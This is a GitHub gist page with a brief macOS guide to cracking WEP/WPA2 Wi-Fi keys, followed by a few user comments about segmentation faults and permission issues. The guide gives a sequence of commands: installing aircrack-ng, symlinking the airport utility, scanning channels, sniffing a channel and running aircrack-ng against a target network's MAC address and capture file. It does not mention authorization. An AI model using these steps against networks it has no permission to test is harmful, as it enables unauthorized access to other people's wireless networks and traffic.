-
-
Save mtrovilho/e65abe9288b6885864be7b5dd7d87e26 to your computer and use it in GitHub Desktop.
Cracking WPA2 / WEP Wifi / Aircrack 10 seconds guide. For Mac OSX
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Install the latest Xcode, with the Command Line Tools. | |
// Install Homebrew | |
// Install aircrack-ng: | |
brew install aircrack-ng | |
// Create the following symlink: | |
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/sbin/airport | |
// Figure out which channel you need to sniff: | |
sudo airport -s | |
// Sniff | |
// NOTE: the cap_file will be located in the /tmp/airportSniff*.cap. | |
sudo airport en1 sniff [CHANNEL] | |
// Crack | |
// Optional flags: -1 only 1 try with PTW | |
// -a attack mode (1/WEP, 2/WPA-PSK) | |
aircrack-ng -b [TARGET_MAC_ADDRESS] [CAP_FILE] |
Segmentation fault : 11 while running the command sudo airport en0 sniff [CHANNEL]
currently on mac osX Mojave 10.14
i have a segmentation fault 11 too with mac os mojave
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
good find with the
/usr/local/sbin/airport
for OS X El Capitan. I was starting to think the utility wasn't included, actually just a permission issue